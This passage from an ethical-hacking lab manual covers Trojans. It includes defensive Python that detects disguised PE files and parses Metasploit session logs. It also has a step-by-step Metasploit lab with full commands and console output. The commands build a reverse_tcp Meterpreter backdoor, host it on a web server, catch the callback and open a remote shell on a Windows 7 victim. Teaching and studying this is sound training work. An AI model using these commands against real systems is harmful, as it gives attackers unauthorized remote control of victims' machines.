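The Server Name(s) and Extension(s) fields of the MoSucker server editor (Figure 10.7) let a generated server hide behind a system-like file name and a non-executable extension. The following added example, written for this edition and not code from the lab manual or from MoSucker, shows how an analyst documenting the lab results could check a directory for both signs: it reads the PE header instead of trusting the file name, so a Windows executable saved as server.txp or named kernel32.exe outside a system directory is reported. The sample files, the list of system-like names and the set of expected executable extensions are constructed assumptions for this example.

```python
"""Added example (not part of the CEH lab manual): flag files whose contents are a
Windows PE image but whose name or extension disguises that fact, the two tricks
exposed by the Server Name(s) and Extension(s) fields of the MoSucker editor.
Standard library only; the sample files are constructed in a temporary directory.
"""
import os
import struct
import tempfile
from dataclasses import dataclass

# Extensions under which a PE image is expected. A file starting with an MZ
# header under any other extension (.pif, .com, .bat, .txp ...) is suspicious.
EXPECTED_PE_EXTENSIONS = {".exe", ".dll", ".sys", ".ocx", ".scr", ".cpl"}

# Names of Windows system binaries a Trojan server commonly borrows. Outside a
# system directory these names are a red flag. Constructed list for this example.
SYSTEM_LIKE_NAMES = {"kernel32", "msconfig", "winexec32", "netconfig",
                     "svchost", "lsass", "csrss"}


@dataclass
class Finding:
    path: str
    reason: str


def is_pe_image(path):
    """True if the file has an MZ header and e_lfanew points at the 'PE\\0\\0' signature."""
    with open(path, "rb") as f:
        head = f.read(64)
        if len(head) < 64 or head[:2] != b"MZ":
            return False
        e_lfanew = struct.unpack_from("<I", head, 0x3C)[0]
        f.seek(e_lfanew)
        return f.read(4) == b"PE\x00\x00"


def scan_directory(root, system_dirs=()):
    """Walk root and report PE images with disguised extensions or system-like names."""
    findings = []
    sysdirs = tuple(os.path.normcase(os.path.abspath(d)) for d in system_dirs)
    for dirpath, _, filenames in os.walk(root):
        in_sysdir = os.path.normcase(os.path.abspath(dirpath)).startswith(sysdirs)
        for name in filenames:
            path = os.path.join(dirpath, name)
            stem, ext = os.path.splitext(name)
            try:
                if not is_pe_image(path):
                    continue          # not an executable image, whatever it is called
            except OSError:
                continue
            if ext.lower() not in EXPECTED_PE_EXTENSIONS:
                findings.append(Finding(path, f"PE image disguised with extension {ext or '(none)'}"))
            if stem.lower() in SYSTEM_LIKE_NAMES and not in_sysdir:
                findings.append(Finding(path, f"system-like name {stem!r} outside a system directory"))
    return findings


def build_minimal_pe():
    """Constructed bytes with a valid DOS header and PE signature (not a runnable program)."""
    dos = bytearray(64)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 64)   # e_lfanew: PE signature right after the DOS header
    return bytes(dos) + b"PE\x00\x00" + b"\x00" * 20


def build_sample_tree():
    """Create constructed sample files in a fresh temporary directory."""
    root = tempfile.mkdtemp(prefix="trojan_scan_")
    pe = build_minimal_pe()
    samples = {
        "server.txp": pe,                # PE hidden behind a custom extension
        "kernel32.exe": pe,              # system-like name in a user directory
        "notes.txt": b"plain text",      # benign
        "ReadMe.bat": b"@echo off\r\n",  # a real batch file, not a PE image
        "tool.exe": pe,                  # PE under an expected extension, ordinary name
    }
    for name, data in samples.items():
        with open(os.path.join(root, name), "wb") as f:
            f.write(data)
    return root


def demo():
    """Scan the constructed tree; returns sorted (file name, reason) pairs."""
    root = build_sample_tree()
    findings = scan_directory(root, system_dirs=[r"C:\Windows"])
    return sorted((os.path.basename(f.path), f.reason) for f in findings)


if __name__ == "__main__":
    for name, reason in demo():
        print(f"{name}: {reason}")
```

Only two of the five sample files are reported: server.txp because its contents are a PE image despite the extension, and kernel32.exe because the name imitates a system binary outside a system directory. ReadMe.bat is not flagged because the check looks at the header, not the extension list, so ordinary scripts do not produce noise.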
PLEASE TALK TO YOUR INSTRUCTOR IF YOU HAVE QUESTIONS RELATED TO THIS LAB.
Tool/Utility: MoSucker
Information Collected/Objectives Achieved: Output: Record the screenshots of the victim's machine
Questions
1. Evaluate and examine various methods to connect to victims if they are in different cities or countries.
☐ Yes ☑ No
Platform Supported
☑ Classroom ☑ iLabs
Hack Windows 7 Using Metasploit
Metasploit Framework is a tool for developing and executing exploit code against a remote target machine.
Lab Scenario
Large companies are common targets for hackers and attackers of various kinds, and it is not uncommon for these companies to be actively monitoring traffic to and from their critical IT infrastructure. Based on the functionality of the Trojan, we can safely surmise that its intent is to open a backdoor on a compromised computer, allowing a remote attacker to monitor activity and steal information from the compromised computer. Once installed inside a corporate network, the backdoor feature of the Trojan can also allow the attacker to use the initially compromised computer as a springboard to launch further forays into the rest of the infrastructure, meaning that the wealth of information that may be stolen could be far greater than that existing on a single machine. A basic principle of all malicious programs is that they need user support to do damage to a computer. That is the reason why Trojan horses try to deceive users by showing them some other form of email. Backdoor programs are used to gain unauthorized access to systems, and backdoor software is used by hackers to gain access to systems so that they can send malicious software to that particular system. Successful attacks in which the hacker or attacker infects the target environment with a customized Trojan horse (backdoor) reveal exploitable holes in the current security system. You are a security administrator of your company, and your job responsibilities include protecting the network from Trojans and backdoors, Trojan attacks, theft of valuable data from the network, and identity theft.
Lab Objectives
The objective of this lab is to help students learn to detect Trojan and backdoor attacks. The objectives of the lab include:
■ Creating a server and testing the network for attack
■ Attacking a network using a sample backdoor and monitoring the system activity
Lab Environment
To carry this out, you need:
■ A computer running Windows Server 2012
■ BackTrack 5 r3 running in Virtual Machine
■ Windows 7 running in Virtual Machine (Victim machine)
■ A web browser with Internet access
■ Administrative privileges to run tools
Lab Duration
Time: 20 Minutes
Overview of Trojans and Backdoors
A Trojan is a program that contains malicious or harmful code inside apparently harmless programming or data in such a way that it can get control and cause damage, such as ruining the file allocation table on a hard drive.
Lab Tasks
TASK 1: Create Server Connection
1. Start BackTrack 5 virtual machine.
2. Open the terminal console by navigating to Applications → BackTrack → Exploitation Tools → Network Exploitation Tools → Metasploit Framework → msfconsole.
Note: Open your terminal (CTRL + ALT + T) and type msfvenom -h to view the available options for this tool.
FIGURE 11.1: Selecting msfconsole from Metasploit Framework
3. Type the following command in msfconsole: msfpayload windows/meterpreter/reverse_tcp LHOST=10.0.0.6 X > Desktop/Backdoor.exe and press Enter.
Note: This IP address (10.0.0.6) is the BackTrack machine's. These IP addresses may vary in your lab environment.
FIGURE 11.2: Creating Backdoor.exe
4. This command will create a Windows executable file with the name Backdoor.exe, and it will be saved on the BackTrack 5 desktop.
FIGURE 11.3: Created Backdoor.exe file
5. Now you need to share Backdoor.exe with your victim machine (Windows 7), by following these steps:
6. Open a new BackTrack 5 terminal (CTRL+ALT+T), then run the command mkdir /var/www/share and press Enter to create a new directory named share.
FIGURE 11.4: Creating the share directory
7. Change the mode of the share folder to 755 by entering the command chmod -R 755 /var/www/share/ and then press Enter.
FIGURE 11.5: Changing the share folder mode to 755
8. Change the ownership of that folder to www-data by entering the command chown -R www-data:www-data /var/www/share/ and then press Enter.
FIGURE 11.6: Change the ownership of the folder
9. Type the command ls -la /var/www/ | grep share and then press Enter.
FIGURE 11.7: Sharing the Backdoor.exe file
10. The next step is to start the Apache server by typing the service apache2 start command in the terminal, and then press Enter.
Note: Files generated by Metasploit are saved under /root/.msf4/data/exploits/; to publish them through the Apache web server, copy them into the share folder with the following command: cp /root/.msf4/data/exploits/* /var/www/share/
FIGURE 11.8: Starting Apache Webserver
11. Now that your Apache web server is running, copy the Backdoor.exe file into the share folder. Type the following command: cp /root/Desktop/Backdoor.exe /var/www/share/ and press Enter.
FIGURE 11.9: Running Apache Webserver
12. Now go to Windows 7 Virtual Machine, open Firefox or any web browser, type the URL http://10.0.0.6/share/ in the URL field, and then press Enter.
Note: Here 10.0.0.6 is the IP address of BackTrack; it may vary in your lab environment.
[Browser: Index of /share at http://10.0.0.6/share/, listing Backdoor.exe, 23-Oct-2012 12:12, 72K; Apache/2.2.14 (Ubuntu) Server at 10.0.0.6 Port 80.]
FIGURE 11.10: Firefox web browser with Backdoor.exe
Note: If you don't have apache2 installed, run apt-get install apache2.
13. Download the Backdoor.exe file in Windows 7 Virtual Machine and save this file on the desktop.
w FIGURE 11.11: Saved Backdoor.exe on desktop
14. Switch back to the BackTrack machine.
15. Open the Metasploit console. To create a handler to handle the connection from the victim machine (Windows 7), type the command use exploit/multi/handler and press Enter.
Note: The exploit will be saved in the /root/.msf4/data/exploits/ folder.
FIGURE 11.12: Exploit the victim machine
16. To use the reverse TCP payload, type the command set payload windows/meterpreter/reverse_tcp and press Enter.
FIGURE 11.13: Setup the reverse TCP
17. To set the local IP address that will catch the reverse connection, type the command set lhost 10.0.0.6 (BackTrack IP address) and press Enter.
FIGURE 11.14: Set the local IP address
18. To start the handler, type the command exploit -j -z and press Enter.
[Terminal: Exploit running as background job. Started reverse handler on 10.0.0.6:4444. Starting the payload handler...]
FIGURE 11.15: Exploit the Windows 7 machine
19. Now switch to the victim machine (Windows 7) and double-click the Backdoor.exe file (which is already downloaded) to run it.
20. Again switch to the BackTrack machine, and you can see the following figure.
CEH Lab Manual Page 525
Ethical Hacking and Countermeasures Copyright © by EC-Council. All Rights Reserved. Reproduction is Strictly Prohibited.
msf > msfpayload windows/meterpreter/reverse_tcp LHOST=10.0.0.6 X > Desktop Backdoor.exe
[*] exec: msfpayload windows/meterpreter/reverse_tcp LHOST=10.0.0.6 X > Desktop Backdoor.exe
sh: Desktop: is a directory
msf > msfpayload windows/meterpreter/reverse_tcp LHOST=10.0.0.6 X > Desktop/Backdoor.exe
[*] exec: msfpayload windows/meterpreter/reverse_tcp LHOST=10.0.0.6 X > Desktop/Backdoor.exe
Created by msfpayload (http://www.metasploit.com).
Payload: windows/meterpreter/reverse_tcp
Length: 290
msf > use exploit/multi/handler
msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(handler) > set lhost 10.0.0.6
lhost => 10.0.0.6
msf exploit(handler) > exploit -j -z
[*] Exploit running as background job.
[*] Started reverse handler on 10.0.0.6:4444
[*] Starting the payload handler...
msf exploit(handler) > [*] Sending stage (752128 bytes) to 10.0.0.5
[*] Meterpreter session 1 opened (10.0.0.6:4444 -> 10.0.0.5:49458) at 2012-10-23
FIGURE 11.16: Exploit result of the Windows 7 machine
Note: To interact with the available session, you can use sessions -i.
21. To interact with the available session, type the command sessions -i 1 and press Enter.
FIGURE 11.17: creating the session
22. Enter the command shell, and press Enter.
msf exploit(handler) > sessions -i 1
[*] Starting interaction with 1...
meterpreter > shell
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.

C:\Users\Admin\Desktop>
FIGURE 11.18: Type the shell command
23. Type the dir command and press Enter. It lists all the directories present on the victim machine (Windows 7).
msf exploit(handler) > sessions -i 1
[-] Invalid session id
msf exploit(handler) > sessions -i 2
[*] Starting interaction with 2...
meterpreter > shell
Process 2540 created.
Channel 1 created.
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.

C:\Users\Admin\Desktop>dir
 Volume in drive C has no label.
 Volume Serial Number is 6868-71F6

 Directory of C:\Users\Admin\Desktop

10/23/2012  02:56 PM    <DIR>          .
               56,679,985,152 bytes free

C:\Users\Admin\Desktop>
FIGURE 11.19: Check the directories of Windows 7
Lab Analysis
Analyze and document the results of the lab exercise. Give your opinion on your target's security posture and its exposure through public and free information.
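The Lab Analysis step asks you to document what the exercise produced. The following is an added example, not part of the CEH lab manual or of Metasploit: it parses the handler console lines of the kind shown in Figures 11.15 and 11.16 into a structured session record, then correlates that record with netstat-style output from the victim to identify the process holding the connection back to the handler (the evidence a defender would collect). All log lines, the netstat lines, the PID, the timestamp and the byte count are constructed sample values that mirror the figures; the function and record names are this example's own.

```python
"""Parse Metasploit handler output and correlate it with victim-side netstat
output, to document the lab results.

Added example for the Lab Analysis step; not part of the CEH lab manual or
of Metasploit.  Every input below is constructed: the handler lines follow
the format printed in Figures 11.15 and 11.16, and the netstat lines follow
the format of `netstat -ano` on Windows.  IPs, ports, PID, stage size and
timestamp are sample values.
"""
import re
from dataclasses import dataclass
from typing import Dict, List, Optional

# Constructed handler console output (same format as the figures on this page).
HANDLER_OUTPUT = """\
[*] Exploit running as background job.
[*] Started reverse handler on 10.0.0.6:4444
[*] Starting the payload handler...
[*] Sending stage (752128 bytes) to 10.0.0.5
[*] Meterpreter session 1 opened (10.0.0.6:4444 -> 10.0.0.5:49458) at 2012-10-23 12:57:52 +0530
"""

# Constructed `netstat -ano` lines as seen on the victim (sample values).
VICTIM_NETSTAT = """\
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING       712
  TCP    10.0.0.5:49458         10.0.0.6:4444          ESTABLISHED     1884
  TCP    10.0.0.5:49459         10.0.0.7:445           ESTABLISHED     4
"""


@dataclass
class SessionRecord:
    session_id: int
    handler_ip: str
    handler_port: int
    victim_ip: str
    victim_port: int
    stage_bytes: Optional[int]   # size of the staged payload, if seen
    opened_at: str


IP = r"(\d+\.\d+\.\d+\.\d+)"
SESSION_RE = re.compile(
    r"Meterpreter session (\d+) opened \(" + IP + r":(\d+) -> " + IP + r":(\d+)\) at (.+)$"
)
STAGE_RE = re.compile(r"Sending stage \((\d+) bytes\) to " + IP)
NETSTAT_RE = re.compile(r"^\s*TCP\s+(\S+):(\d+)\s+(\S+):(\d+)\s+(\w+)\s+(\d+)\s*$")


def parse_handler_output(text: str) -> List[SessionRecord]:
    """Turn the handler's console lines into structured session records."""
    stage_bytes: Dict[str, int] = {}   # victim ip -> bytes of the staged payload
    records: List[SessionRecord] = []
    for line in text.splitlines():
        m = STAGE_RE.search(line)
        if m:
            stage_bytes[m.group(2)] = int(m.group(1))
            continue
        m = SESSION_RE.search(line)
        if m:
            sid, hip, hport, vip, vport, when = m.groups()
            records.append(SessionRecord(int(sid), hip, int(hport), vip, int(vport),
                                         stage_bytes.get(vip), when.strip()))
    return records


def find_victim_connection(netstat_text: str, rec: SessionRecord) -> Optional[int]:
    """Return the PID on the victim that owns the ESTABLISHED connection to the handler."""
    for line in netstat_text.splitlines():
        m = NETSTAT_RE.match(line)
        if not m:
            continue
        lip, lport, rip, rport, state, pid = m.groups()
        if (lip, int(lport), rip, int(rport), state) == (
                rec.victim_ip, rec.victim_port, rec.handler_ip, rec.handler_port, "ESTABLISHED"):
            return int(pid)
    return None


def lab_report(handler_text: str, netstat_text: str) -> List[dict]:
    """One row per session: who connected where, how big the stage was, which PID."""
    rows = []
    for rec in parse_handler_output(handler_text):
        rows.append({
            "session": rec.session_id,
            "victim": f"{rec.victim_ip}:{rec.victim_port}",
            "handler": f"{rec.handler_ip}:{rec.handler_port}",
            "stage_bytes": rec.stage_bytes,
            "victim_pid": find_victim_connection(netstat_text, rec),
            "opened_at": rec.opened_at,
        })
    return rows


if __name__ == "__main__":
    for row in lab_report(HANDLER_OUTPUT, VICTIM_NETSTAT):
        print(row)
```

The report row ties the handler's view (session 1, stage of 752128 bytes) to the victim's view (local ephemeral port 49458 connected to 10.0.0.6:4444, owned by one PID), which is what you would record in the lab write-up and what a host-based check would alert on.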
PLEASE TALK TO YOUR INSTRUCTOR IF YOU HAVE QUESTIONS RELATED TO THIS LAB.

Tool/Utility: Metasploit
Information Collected/Objectives Achieved: Output: Hack the Windows 7 machine directories
Internet Connection Required: ☐ Yes  ☑ No
Platform Supported: ☑ Classroom  ☑ iLabs